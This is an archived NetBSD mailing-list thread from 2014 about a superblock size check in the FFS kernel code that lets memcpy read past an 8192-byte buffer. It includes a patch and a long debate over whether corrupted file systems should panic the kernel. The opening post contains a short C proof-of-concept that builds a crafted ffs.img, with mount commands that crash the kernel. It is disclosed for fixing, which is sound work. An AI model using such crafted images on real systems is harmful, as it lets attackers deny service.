FFS: wrong superblock check ~> crash

Discussion:

FFS: wrong superblock check ~> crash

Maxime Villard

2014-10-20 13:38:11 UTC

Probably with the conviction I would find some bugs I opened ffs/ffs_vfsops.c
and something immediately stroke me:

918 error = bread(devvp, sblock_try[i] / DEV_BSIZE, SBLOCKSIZE, cred,
919 0, &bp);

SBLOCKSIZE (=8192) bytes are read on the disk and put into bp->b_data
(allocated).

924 fs = (struct fs*)bp->b_data;
...
939 sbsize = fs->fs_sbsize;

'sbsize' is set to a value that was read on the disk.

976 /* Validate size of superblock */
977 if (sbsize > MAXBSIZE || sbsize < sizeof(struct fs))
978 continue;

Basic sanity checks. MAXBSIZE = 64 * 1024.

991 fs = kmem_alloc((u_long)sbsize, KM_SLEEP);
992 memcpy(fs, bp->b_data, sbsize);

And then comes this memcpy. The problem here is that the size of b_data is
8192, but the values of sbsize are located in [1376; 65536].

With a broken superblock the kernel will read far beyond the allocated
area, which mostly means it will crash.

Exploit:

------------------------------ ffs.c ------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <ufs/ffs/fs.h>

#define MAXBSIZE (64 * 1024)

int main() {
struct fs fs;
char byte[65536] = "";
FILE *f;

memset(&fs, 0, sizeof(fs));
fs.fs_magic = FS_UFS1_MAGIC;
fs.fs_sbsize = MAXBSIZE-1;
fs.fs_bsize = MAXBSIZE-1;
fs.fs_sblockloc = 1024;

f = fopen("ffs.img", "w");
fwrite(&fs, sizeof(fs), 1, f);
fwrite(&byte, 1, 65536 - sizeof(fs), f);
fclose(f);
return 0;
}

# ./ffs
# vnconfig vnd0d ffs.img
# mount /dev/vnd0d /mnt
-> crash
-------------------------------------------------------------------

I think the sanity check should be:

Index: ffs_vfsops.c
===================================================================
RCS file: /cvsroot/src/sys/ufs/ffs/ffs_vfsops.c,v
retrieving revision 1.299
diff -u -r1.299 ffs_vfsops.c
--- ffs_vfsops.c 24 May 2014 16:34:04 -0000 1.299
+++ ffs_vfsops.c 20 Oct 2014 13:01:46 -0000
@@ -974,7 +974,7 @@
continue;

/* Validate size of superblock */
- if (sbsize > MAXBSIZE || sbsize < sizeof(struct fs))
+ if (sbsize > SBLOCKSIZE || sbsize < sizeof(struct fs))
continue;

/* Check that we can handle the file system blocksize */

Tested on NetBSD-current: no longer crashes.

Ok/Comments?

J. Hannken-Illjes

2014-10-20 15:19:11 UTC

Post by Maxime Villard
Probably with the conviction I would find some bugs I opened ffs/ffs_vfsops.c

<snip>

Post by Maxime Villard
Index: ffs_vfsops.c
===================================================================
RCS file: /cvsroot/src/sys/ufs/ffs/ffs_vfsops.c,v
retrieving revision 1.299
diff -u -r1.299 ffs_vfsops.c
--- ffs_vfsops.c 24 May 2014 16:34:04 -0000 1.299
+++ ffs_vfsops.c 20 Oct 2014 13:01:46 -0000
@@ -974,7 +974,7 @@
continue;
/* Validate size of superblock */
- if (sbsize > MAXBSIZE || sbsize < sizeof(struct fs))
+ if (sbsize > SBLOCKSIZE || sbsize < sizeof(struct fs))
continue;
/* Check that we can handle the file system blocksize */
Tested on NetBSD-current: no longer crashes.
Ok/Comments?

Looks ok.

--
J. Hannken-Illjes - ***@eis.cs.tu-bs.de - TU Braunschweig (Germany)

Manuel Bouyer

2014-10-20 15:46:06 UTC

Post by Maxime Villard
[...]
With a broken superblock the kernel will read far beyond the allocated
area, which mostly means it will crash.

Sure. There's lot of other ways to crash the kernel with a broken ffs.
In this specific case it's OK to return an error, but in the general
case I prefer to have the kernel panic when an inconsistency is
detected in ffs, than return an error and try to continue running with
a bogus filesystem.

--
Manuel Bouyer <***@antioche.eu.org>
NetBSD: 26 ans d'experience feront toujours la difference
--

Taylor R Campbell

2014-10-20 15:58:45 UTC

Date: Mon, 20 Oct 2014 17:46:06 +0200
From: Manuel Bouyer <***@antioche.eu.org>

Sure. There's lot of other ways to crash the kernel with a broken ffs.
In this specific case it's OK to return an error, but in the general
case I prefer to have the kernel panic when an inconsistency is
detected in ffs, than return an error and try to continue running with
a bogus filesystem.

Continuing to run with a bogus file system is no good, but panicking
the kernel is worse. If the kernel takes any drastic action beyond
merely returning an error, it should remount the file system
read-only.

Manuel Bouyer

2014-10-20 16:18:51 UTC

Post by Taylor R Campbell
Date: Mon, 20 Oct 2014 17:46:06 +0200
Sure. There's lot of other ways to crash the kernel with a broken ffs.
In this specific case it's OK to return an error, but in the general
case I prefer to have the kernel panic when an inconsistency is
detected in ffs, than return an error and try to continue running with
a bogus filesystem.
Continuing to run with a bogus file system is no good, but panicking
the kernel is worse. If the kernel takes any drastic action beyond
merely returning an error, it should remount the file system
read-only.

definitively not. I want a panic. If the filesystsem is corrupted something
has gone really wrong and you can't trust the running system any more.
And there are cases where returning EROFS is worse than panicing (e.g.
a NFS server).

--
Manuel Bouyer <***@antioche.eu.org>
NetBSD: 26 ans d'experience feront toujours la difference
--

Greg Troxel

2014-10-20 17:10:58 UTC

Post by Manuel Bouyer

Post by Taylor R Campbell
Date: Mon, 20 Oct 2014 17:46:06 +0200
Sure. There's lot of other ways to crash the kernel with a broken ffs.
In this specific case it's OK to return an error, but in the general
case I prefer to have the kernel panic when an inconsistency is
detected in ffs, than return an error and try to continue running with
a bogus filesystem.
Continuing to run with a bogus file system is no good, but panicking
the kernel is worse. If the kernel takes any drastic action beyond
merely returning an error, it should remount the file system
read-only.

definitively not. I want a panic. If the filesystsem is corrupted something
has gone really wrong and you can't trust the running system any more.
And there are cases where returning EROFS is worse than panicing (e.g.
a NFS server).

The basic issue here is that there are two use cases:

The FFS file system in question is /, or /usr, or something else that
the operator deems Wicked Important.

The FFS file syste is on some random removable media that someone just
wants to access.

The desires, while each is reasonabl, are totally different.

I would suggest a new filesystem option (perhaps "poe" for panic on
error, with a nod to Dr. Strangelove) that causes detection of
consistency errors to panic rather than error. Then people can turn it
on for filesystems that are so critical that they prefer a panic.

Manuel Bouyer

2014-10-20 17:34:07 UTC

Post by Greg Troxel
[...]
The FFS file system in question is /, or /usr, or something else that
the operator deems Wicked Important.
The FFS file syste is on some random removable media that someone just
wants to access.

For random removable media, the only reasonable way to access it is
from a non-root userland process :) Or in a single-use virtual machine.

Maybe we should run the USB stack in a non-root userland too, BTW.

--
Manuel Bouyer <***@antioche.eu.org>
NetBSD: 26 ans d'experience feront toujours la difference
--

Manuel Bouyer

2014-10-20 17:27:37 UTC

I disagree.
There?s a principle of networking product design, which is that you are never allowed to crash due to external input. If you receive an invalid packet, you can complain about it and say the sender is broken, but if you crash from it it?s always your bug, no excuses, no exceptions.

I agree.

I would treat all external inputs that way; storage is an external input.

no, for most server usage it's internal input. You don't plug random
USB keys to your servers, don't you ? And even if I have ffs on
USB keys I don't consider them as external as I use them only on
my systems.

Panics are for INTERNAL consistency failures, for example a state machine that gets into a non-existent state. But any objection to outside data must be a rejection of that data, nothing more.

I agree. And if the kernel detects an inconsistent ffs state, it's either
because it did write bogus data to the disk (in which case you can consider
that the kernel itself is in an inconsistent state) or because the
hardware is bogus (in which case a panic is also not that silly).

Remounting a filesystem read-only on a running server is certainly the worse
way of dealing with the problem.

--
Manuel Bouyer, LIP6, Universite Paris VI. ***@lip6.fr
Tel: 01 44 27 70 14 Fax: 01 44 27 72 80
--

P***@Dell.com

2014-10-20 16:57:19 UTC

Post by Manuel Bouyer

Post by Taylor R Campbell
Date: Mon, 20 Oct 2014 17:46:06 +0200
Sure. There's lot of other ways to crash the kernel with a broken ffs.
In this specific case it's OK to return an error, but in the general
case I prefer to have the kernel panic when an inconsistency is
detected in ffs, than return an error and try to continue running with
a bogus filesystem.
Continuing to run with a bogus file system is no good, but panicking
the kernel is worse. If the kernel takes any drastic action beyond
merely returning an error, it should remount the file system
read-only.

definitively not. I want a panic. If the filesystsem is corrupted something
has gone really wrong and you can't trust the running system any more.
And there are cases where returning EROFS is worse than panicing (e.g.
a NFS server).

I disagree.

There’s a principle of networking product design, which is that you are never allowed to crash due to external input. If you receive an invalid packet, you can complain about it and say the sender is broken, but if you crash from it it’s always your bug, no excuses, no exceptions.

I would treat all external inputs that way; storage is an external input. Panics are for INTERNAL consistency failures, for example a state machine that gets into a non-existent state. But any objection to outside data must be a rejection of that data, nothing more.

(The root file system might be a corner case. But non-root file systems, no.)

paul

Mindaugas Rasiukevicius

2014-10-20 18:48:31 UTC

Post by Manuel Bouyer

Post by Taylor R Campbell
Date: Mon, 20 Oct 2014 17:46:06 +0200
Sure. There's lot of other ways to crash the kernel with a broken
ffs. In this specific case it's OK to return an error, but in the
general case I prefer to have the kernel panic when an inconsistency is
detected in ffs, than return an error and try to continue running
with a bogus filesystem.
Continuing to run with a bogus file system is no good, but panicking
the kernel is worse. If the kernel takes any drastic action beyond
merely returning an error, it should remount the file system
read-only.

definitively not. I want a panic. If the filesystsem is corrupted
something has gone really wrong and you can't trust the running system
any more. And there are cases where returning EROFS is worse than
panicing (e.g. a NFS server).

Disagree. The kernel should remount the file system in read-only mode.

Perhaps we can debate what to do with corrupted / when the system is
booting, but for other cases (especially hot-plug or external disks)
I certainly do not expect a crash. The system should clearly indicate
the errors to the user and be defensive (hence remount in read-only),
but if I insert a USB stick with a garbage and my system crashes then
it is a plain bug with potential security implications.

--
Mindaugas

Manuel Bouyer

2014-10-20 18:57:06 UTC

Post by Mindaugas Rasiukevicius

Post by Manuel Bouyer
definitively not. I want a panic. If the filesystsem is corrupted
something has gone really wrong and you can't trust the running system
any more. And there are cases where returning EROFS is worse than
panicing (e.g. a NFS server).

Disagree. The kernel should remount the file system in read-only mode.
Perhaps we can debate what to do with corrupted / when the system is
booting, but for other cases (especially hot-plug or external disks)
I certainly do not expect a crash.

I do, it's the only sane thing to do if the systen did write bogus
data to the disk and notice it later. Remounting in read-only mode
on a server with active services running doens't do anything good
(I know because linux servers do this. A panic and reboot is a much
better behavior).

If the corrupted filesystem is from a corrupted USB key then not panicing
is probably better; but 1) USB keys usually don't have ffs on them 2)
In such case it would be better to run the filesystem code in userland anyway.

Now if the behavior can be choosen at compile or run-time I'm happy with
it, but there needs to be a way to keep the current behavior.

--
Manuel Bouyer <***@antioche.eu.org>
NetBSD: 26 ans d'experience feront toujours la difference
--

Mindaugas Rasiukevicius

2014-10-20 19:44:21 UTC

Post by Manuel Bouyer

Post by Mindaugas Rasiukevicius

Post by Manuel Bouyer
definitively not. I want a panic. If the filesystsem is corrupted
something has gone really wrong and you can't trust the running system
any more. And there are cases where returning EROFS is worse than
panicing (e.g. a NFS server).

Disagree. The kernel should remount the file system in read-only mode.
Perhaps we can debate what to do with corrupted / when the system is
booting, but for other cases (especially hot-plug or external disks)
I certainly do not expect a crash.

I do, it's the only sane thing to do if the systen did write bogus
data to the disk and notice it later. Remounting in read-only mode
on a server with active services running doens't do anything good
(I know because linux servers do this. A panic and reboot is a much
better behavior).

Huh? If your use case is a single / partition for everything then sure.
I can actually extend my statement: the system should not crash neither
in a case of corrupt file system nor a disk failure (which may or may not
lead to corrupt file system).

If I have a system with an array of disks and one of them fails, a crash
would take down the whole node. When many terabytes of data suddenly
disappear people get unhappy; it usually costs quite a bit of money too.
So, how about making only the *failed* segment of data unavailable? In
many cases this is suitable and desirable; consider distributed systems
(you have redundancy) or caches (where I can just discard the corrupted
data segment and refetch it from the origin). Meanwhile, I can replace
the failed disk and/or rebuild the corrupt file system while experiencing
only a limited disruption.

Post by Manuel Bouyer
If the corrupted filesystem is from a corrupted USB key then not panicing
is probably better; but 1) USB keys usually don't have ffs on them 2)
In such case it would be better to run the filesystem code in userland anyway.

So now you make an assumption about file systems used on USB sticks?
That does not matter. Somebody can create a USB stick with manually
handcrafted superblock to crash your machine or maybe even exploit it.
To me, that constitutes a security vulnerability.

--
Mindaugas

Manuel Bouyer

2014-10-20 20:10:43 UTC

Post by Mindaugas Rasiukevicius
Huh? If your use case is a single / partition for everything then sure.

I don't but other are equally important.

Post by Mindaugas Rasiukevicius
I can actually extend my statement: the system should not crash neither
in a case of corrupt file system nor a disk failure (which may or may not
lead to corrupt file system).

detectable disk failures are handled by RAID in my context.
But I've also got the case of disks that would silently corrupt data.
In this case you want to stop operations ASAP because if you keep things
running you only make things worse (corrupting good data on other members
of the RAID).

Post by Mindaugas Rasiukevicius
If I have a system with an array of disks and one of them fails, a crash
would take down the whole node. When many terabytes of data suddenly
disappear people get unhappy;

As they would if the partition they're working on suddently becomes read-only.
It may be less damaging to stop the server, even if only one of the
many partitions is affected (and if you have that many partitions,
maybe you should also have more servers)

Post by Mindaugas Rasiukevicius
it usually costs quite a bit of money too.
So, how about making only the *failed* segment of data unavailable? In
many cases this is suitable and desirable; consider distributed systems
(you have redundancy)

then you can take the system down, no problem. It's even probably better
to take it down completely, than letting it run in degraded mode.

Post by Mindaugas Rasiukevicius
or caches (where I can just discard the corrupted
data segment and refetch it from the origin).

How can the cache know where the corruption comes from ?

Anywau I can't see existing software that could deal gracefully with the
filesystem they're working on becoming unavailable. remounting read-only
is the default linux behavior and I've been hit by this many times.
Not only the server was unavailable to users, but it created
other problems (like mails bouncing, nfs operations failing instead
of just waiting for the server to come back, etc) while the server ran
in degraded mode before someone could stop it.

Post by Mindaugas Rasiukevicius
Meanwhile, I can replace
the failed disk and/or rebuild the corrupt file system while experiencing
only a limited disruption.

Post by Manuel Bouyer
If the corrupted filesystem is from a corrupted USB key then not panicing
is probably better; but 1) USB keys usually don't have ffs on them 2)
In such case it would be better to run the filesystem code in userland anyway.

So now you make an assumption about file systems used on USB sticks?
That does not matter. Somebody can create a USB stick with manually
handcrafted superblock to crash your machine or maybe even exploit it.
To me, that constitutes a security vulnerability.

Of course he can. He can also change the firmware of the USB stick
for this purpose. That's why untrusted USB sticks should not be mounted
using the in-kernel filesystems (but the USB stack may be a problem too).

--
Manuel Bouyer <***@antioche.eu.org>
NetBSD: 26 ans d'experience feront toujours la difference
--

Michael van Elst

2014-10-20 22:18:17 UTC

Post by Mindaugas Rasiukevicius
If I have a system with an array of disks and one of them fails, a crash
would take down the whole node. When many terabytes of data suddenly
disappear people get unhappy;

When a single node going down makes people unhappy, you may want to have
more than one :)

Post by Mindaugas Rasiukevicius
it usually costs quite a bit of money too.
So, how about making only the *failed* segment of data unavailable?

It all depends on what you can or are willing to handle. Also what a
crash (and reboot) would actually solve. It doesn't help if your
boot partition is damaged and you force a reboot, converting a
maybe half working system into a dead system.

In my use case, a broken filesystem is usually a sign of an unnoticed
hardware or software error and the best reaction to recover is to
panic (and throw the data away, the machines have only temporary
data). Continuing with a read-only filesystem doesn't do any good,
because you have no means to find out wether the data you can read
is complete or correct.

Most clustered systems also handle complete outages better than
a degraded mode. That's why you have things like STONITH.

Your workstation or laptop usually has different requirements.

Mindaugas Rasiukevicius

2014-10-20 23:13:19 UTC

Post by Michael van Elst

Post by Mindaugas Rasiukevicius
If I have a system with an array of disks and one of them fails, a crash
would take down the whole node. When many terabytes of data suddenly
disappear people get unhappy;

When a single node going down makes people unhappy, you may want to have
more than one :)

There are convergence and recovery times which may have an extra cost
for you. Sure, the failure of a single node might merely result in an
increased latency somewhere. However, there can be a significant
difference in recovering the whole node and just replacing/recovering
one segment of data in it. That is especially the case with the caches,
you do not want to randomly blow and refill them - it takes some time.

Post by Michael van Elst

Post by Mindaugas Rasiukevicius
it usually costs quite a bit of money too.
So, how about making only the *failed* segment of data unavailable?

It all depends on what you can or are willing to handle. Also what a
crash (and reboot) would actually solve. It doesn't help if your
boot partition is damaged and you force a reboot, converting a
maybe half working system into a dead system.

Not really relevant to my example where you would have dedicated disks
for the data, but I think we agree on this - there are different use
cases and it depends. If the boot partition is damaged, then it does
indeed most likely mean that the system is not in the state where it
can do its job. I would probably still just mount the file system to
read-only mode and let it fail elsewhere, but it may as well panic; at
this point it is non-functioning and requires manual intervention anyway.

Post by Michael van Elst
In my use case, a broken filesystem is usually a sign of an unnoticed
hardware or software error and the best reaction to recover is to
panic (and throw the data away, the machines have only temporary
data). Continuing with a read-only filesystem doesn't do any good,
because you have no means to find out wether the data you can read
is complete or correct.

Why not? It seems to be a question of how do you communicate the errors
back to the applications or administrator. There are applications which
gracefully handle EIOs exactly for this purpose. The fact that they are
very rare does not mean they do not exist. :)

Post by Michael van Elst
Most clustered systems also handle complete outages better than
a degraded mode. That's why you have things like STONITH.

It really depends on the application or service; you often have to take
design considerations for both though.

--
Mindaugas

Michael van Elst

2014-10-21 05:45:03 UTC

Post by Mindaugas Rasiukevicius

Post by Michael van Elst
In my use case, a broken filesystem is usually a sign of an unnoticed
hardware or software error and the best reaction to recover is to
panic (and throw the data away, the machines have only temporary
data). Continuing with a read-only filesystem doesn't do any good,
because you have no means to find out wether the data you can read
is complete or correct.

Why not? It seems to be a question of how do you communicate the errors
back to the applications or administrator. There are applications which
gracefully handle EIOs exactly for this purpose. The fact that they are
very rare does not mean they do not exist. :)

See, that's what "in my use case" means.

Post by Mindaugas Rasiukevicius

Post by Michael van Elst
Most clustered systems also handle complete outages better than
a degraded mode. That's why you have things like STONITH.

It really depends on the application or service; you often have to take
design considerations for both though.

That was the point, there is no definitive solution. You, as an
administrator, need to choose.

Martin Husemann

2014-10-20 19:10:02 UTC

Post by Mindaugas Rasiukevicius
Perhaps we can debate what to do with corrupted / when the system is
booting, but for other cases (especially hot-plug or external disks)
I certainly do not expect a crash.

Please raise your hand if you did NOT use "mount -o rump"
when mounting such a disk the last time on NetBSD - anyone?

Martin

Greg Troxel

2014-10-20 19:25:00 UTC

Post by Martin Husemann

Post by Mindaugas Rasiukevicius
Perhaps we can debate what to do with corrupted / when the system is
booting, but for other cases (especially hot-plug or external disks)
I certainly do not expect a crash.

Please raise your hand if you did NOT use "mount -o rump"
when mounting such a disk the last time on NetBSD - anyone?

That certainly is the best practice, but it's a bug if not using rump
leads to trouble.

Michael van Elst

2014-10-20 21:59:40 UTC

Post by Manuel Bouyer
definitively not. I want a panic.

Definitely an administrative decision then. You could make it a
mount option :)

matthew green

2014-10-21 00:44:18 UTC

Post by Michael van Elst

Post by Manuel Bouyer
definitively not. I want a panic.

Definitely an administrative decision then. You could make it a
mount option :)

indeed.

istr that solaris has "onerror=<panic|remount|unmount|...?>" option.

.mrg.

Stephan

2014-10-21 05:29:28 UTC

Yes, you con configure that on a zpool:

failmode YES wait | continue | panic

This is relevant for SAN disks for instance, where you don´t
necessarily want to crash the server when a disk becomes temporary
unavailable.

Post by matthew green

Post by Michael van Elst

Post by Manuel Bouyer
definitively not. I want a panic.

Definitely an administrative decision then. You could make it a
mount option :)

indeed.
istr that solaris has "onerror=<panic|remount|unmount|...?>" option.
.mrg.

Michael van Elst

2014-10-21 05:47:11 UTC

Post by matthew green

Post by Michael van Elst

Post by Manuel Bouyer
definitively not. I want a panic.

Definitely an administrative decision then. You could make it a
mount option :)

indeed.
istr that solaris has "onerror=<panic|remount|unmount|...?>" option.

Same for Linux.

But before you can make it a mount option, the filesystem code
must be able to handle the cases without panic :)

matthew green

2014-10-21 05:57:03 UTC

Post by Michael van Elst

Post by matthew green

Post by Michael van Elst
Definitely an administrative decision then. You could make it a
mount option :)

indeed.
istr that solaris has "onerror=<panic|remount|unmount|...?>" option.

Same for Linux.
But before you can make it a mount option, the filesystem code
must be able to handle the cases without panic :)

minor details... ;)

David Holland

2014-10-21 06:31:03 UTC

Post by Michael van Elst
But before you can make it a mount option, the filesystem code
must be able to handle the cases without panic :)

...which isn't going to happen real soon. It gets "interesting".

--
David A. Holland
***@netbsd.org

Christos Zoulas

2014-10-20 16:53:59 UTC

Post by Taylor R Campbell
Date: Mon, 20 Oct 2014 17:46:06 +0200
Sure. There's lot of other ways to crash the kernel with a broken ffs.
In this specific case it's OK to return an error, but in the general
case I prefer to have the kernel panic when an inconsistency is
detected in ffs, than return an error and try to continue running with
a bogus filesystem.
Continuing to run with a bogus file system is no good, but panicking
the kernel is worse. If the kernel takes any drastic action beyond
merely returning an error, it should remount the file system
read-only.

This is wishful thinking (unless we fix the current set of bugs
that prevent us from doing so even in a healthy filesystem for example
PR/30525). I would be happy if we could isolate the broken filesystem
from all I/O operations instead of crashing.

There are many different recipes that keep filedescriptors for R/W that
corrupt the filesystem during R/O downgrades.

christos

Taylor R Campbell

2014-10-20 22:12:04 UTC

Date: Mon, 20 Oct 2014 16:53:59 +0000 (UTC)

Post by Taylor R Campbell
Continuing to run with a bogus file system is no good, but panicking
the kernel is worse. If the kernel takes any drastic action beyond
merely returning an error, it should remount the file system
read-only.

This is wishful thinking (unless we fix the current set of bugs
that prevent us from doing so even in a healthy filesystem for example
PR/30525). I would be happy if we could isolate the broken filesystem
from all I/O operations instead of crashing.

Yes -- I meant that as a long-term (medium-term?) goal, not as
something we can just do right now.

Christos Zoulas

2014-10-20 16:46:23 UTC

Post by Manuel Bouyer

Post by Maxime Villard
[...]
With a broken superblock the kernel will read far beyond the allocated
area, which mostly means it will crash.

Sure. There's lot of other ways to crash the kernel with a broken ffs.
In this specific case it's OK to return an error, but in the general
case I prefer to have the kernel panic when an inconsistency is
detected in ffs, than return an error and try to continue running with
a bogus filesystem.

Well, this was the mentality 30 years ago (let's panic), and this is why
we are here today. Sure it is fine and safe to panic(), but if I can
prevent the whole system from crashing and I can keep running in degraded
mode (isolating the broken filesystem), I'd rather have the choice to do
so. I.e. The best thing would be to choose the panic or isolate behavior
via a sysctl or a compilation time kernel define.

christos

Masao Uebayashi

2014-10-20 18:22:47 UTC

Post by Christos Zoulas

Post by Manuel Bouyer

Post by Maxime Villard
[...]
With a broken superblock the kernel will read far beyond the allocated
area, which mostly means it will crash.

Sure. There's lot of other ways to crash the kernel with a broken ffs.
In this specific case it's OK to return an error, but in the general
case I prefer to have the kernel panic when an inconsistency is
detected in ffs, than return an error and try to continue running with
a bogus filesystem.

Well, this was the mentality 30 years ago (let's panic), and this is why
we are here today. Sure it is fine and safe to panic(), but if I can
prevent the whole system from crashing and I can keep running in degraded
mode (isolating the broken filesystem), I'd rather have the choice to do
so. I.e. The best thing would be to choose the panic or isolate behavior
via a sysctl or a compilation time kernel define.

Have you heard minix3?

:)

David Holland

2014-10-20 16:23:58 UTC

Post by Maxime Villard
Index: ffs_vfsops.c
===================================================================
RCS file: /cvsroot/src/sys/ufs/ffs/ffs_vfsops.c,v
retrieving revision 1.299
diff -u -r1.299 ffs_vfsops.c
--- ffs_vfsops.c 24 May 2014 16:34:04 -0000 1.299
+++ ffs_vfsops.c 20 Oct 2014 13:01:46 -0000
@@ -974,7 +974,7 @@
continue;
/* Validate size of superblock */
- if (sbsize > MAXBSIZE || sbsize < sizeof(struct fs))
+ if (sbsize > SBLOCKSIZE || sbsize < sizeof(struct fs))
continue;
/* Check that we can handle the file system blocksize */
Tested on NetBSD-current: no longer crashes.
Ok/Comments?

I think the check should be left alone, but afterwards the value
should be clamped to the amount of data that can actually be
transferred. Otherwise I think it may break, e.g. on volumes with odd
block sizes.

I'm not sure what gets put in sbsize in such cases; if it's always
SBLOCKSIZE, then we should probably reject anything that isn't exactly
SBLOCKSIZE and forget about slop or hypothetical compatibility with
larger superblocks. If it's the block size of the block the superblock
is in, though, then there should be a test like this.

Another semi-related thing to check, btw: does it invalidate the
buffers for candidate superblocks that reads and then rejects? Failure
to do this when the volume blocksize isn't SBLOCKSIZE (since it seems
to always read buffers of size SBLOCKSIZE here) might cause
interesting overlapping buffer lossage later.

--
David A. Holland
***@netbsd.org

Maxime Villard

2014-10-20 16:48:37 UTC

Post by David Holland

Post by Maxime Villard
Index: ffs_vfsops.c
===================================================================
RCS file: /cvsroot/src/sys/ufs/ffs/ffs_vfsops.c,v
retrieving revision 1.299
diff -u -r1.299 ffs_vfsops.c
--- ffs_vfsops.c 24 May 2014 16:34:04 -0000 1.299
+++ ffs_vfsops.c 20 Oct 2014 13:01:46 -0000
@@ -974,7 +974,7 @@
continue;
/* Validate size of superblock */
- if (sbsize > MAXBSIZE || sbsize < sizeof(struct fs))
+ if (sbsize > SBLOCKSIZE || sbsize < sizeof(struct fs))
continue;
/* Check that we can handle the file system blocksize */
Tested on NetBSD-current: no longer crashes.
Ok/Comments?

I think the check should be left alone, but afterwards the value
should be clamped to the amount of data that can actually be
transferred. Otherwise I think it may break, e.g. on volumes with odd
block sizes.

Yes that's what I thought first, but I saw a comment in ffs/fs.h on this:

"In all cases the size of the superblock will be SBLOCKSIZE."

Maxime Villard

2014-10-21 07:27:46 UTC

Post by Maxime Villard

Post by David Holland

Post by Maxime Villard
Index: ffs_vfsops.c
===================================================================
RCS file: /cvsroot/src/sys/ufs/ffs/ffs_vfsops.c,v
retrieving revision 1.299
diff -u -r1.299 ffs_vfsops.c
--- ffs_vfsops.c 24 May 2014 16:34:04 -0000 1.299
+++ ffs_vfsops.c 20 Oct 2014 13:01:46 -0000
@@ -974,7 +974,7 @@
continue;
/* Validate size of superblock */
- if (sbsize > MAXBSIZE || sbsize < sizeof(struct fs))
+ if (sbsize > SBLOCKSIZE || sbsize < sizeof(struct fs))
continue;
/* Check that we can handle the file system blocksize */
Tested on NetBSD-current: no longer crashes.
Ok/Comments?

I think the check should be left alone, but afterwards the value
should be clamped to the amount of data that can actually be
transferred. Otherwise I think it may break, e.g. on volumes with odd
block sizes.

"In all cases the size of the superblock will be SBLOCKSIZE."

I think changing

- if (sbsize > MAXBSIZE || sbsize < sizeof(struct fs))
+ if (sbsize > SBLOCKSIZE || sbsize < sizeof(struct fs))

is ok. The kernel will behave randomly if sbsize>8192, and this bug has been
here since the initial revision (20 years ago); if there were really strange
fs'es in the wild they would have triggered a panic, and we would have ended
up knowing it.

This patch simply makes the kernel return an error instead of behaving
randomly, with no implementation change. It is the less intrusive fix.

And from a more or less official specification:

http://www.phptr.com/content/images/0131482092/samplechapter/mcdougall_ch15.pdf

Page 11:
"The primary super-block starts at an offset of 8192 bytes into the partition
slice and occupies one file system block (usually 8192 bytes, but can be 4096
bytes on x86 architectures)."

So 8192 should be fine.

30 Replies
7 Views
Permalink to this page
Disable enhanced parsing

Thread Navigation

Maxime Villard 2014-10-20 13:38:11 UTC

J. Hannken-Illjes 2014-10-20 15:19:11 UTC

Manuel Bouyer 2014-10-20 15:46:06 UTC

Taylor R Campbell 2014-10-20 15:58:45 UTC

Manuel Bouyer 2014-10-20 16:18:51 UTC

Greg Troxel 2014-10-20 17:10:58 UTC

Manuel Bouyer 2014-10-20 17:34:07 UTC

Manuel Bouyer 2014-10-20 17:27:37 UTC

P***@Dell.com 2014-10-20 16:57:19 UTC

Mindaugas Rasiukevicius 2014-10-20 18:48:31 UTC

Manuel Bouyer 2014-10-20 18:57:06 UTC

Mindaugas Rasiukevicius 2014-10-20 19:44:21 UTC

Manuel Bouyer 2014-10-20 20:10:43 UTC

Michael van Elst 2014-10-20 22:18:17 UTC

Mindaugas Rasiukevicius 2014-10-20 23:13:19 UTC

Michael van Elst 2014-10-21 05:45:03 UTC

Martin Husemann 2014-10-20 19:10:02 UTC

Greg Troxel 2014-10-20 19:25:00 UTC

Michael van Elst 2014-10-20 21:59:40 UTC

matthew green 2014-10-21 00:44:18 UTC

Stephan 2014-10-21 05:29:28 UTC

Michael van Elst 2014-10-21 05:47:11 UTC

matthew green 2014-10-21 05:57:03 UTC

David Holland 2014-10-21 06:31:03 UTC

Christos Zoulas 2014-10-20 16:53:59 UTC

Taylor R Campbell 2014-10-20 22:12:04 UTC

Christos Zoulas 2014-10-20 16:46:23 UTC

Masao Uebayashi 2014-10-20 18:22:47 UTC

David Holland 2014-10-20 16:23:58 UTC

Maxime Villard 2014-10-20 16:48:37 UTC

Maxime Villard 2014-10-21 07:27:46 UTC

about - legalese

Loading...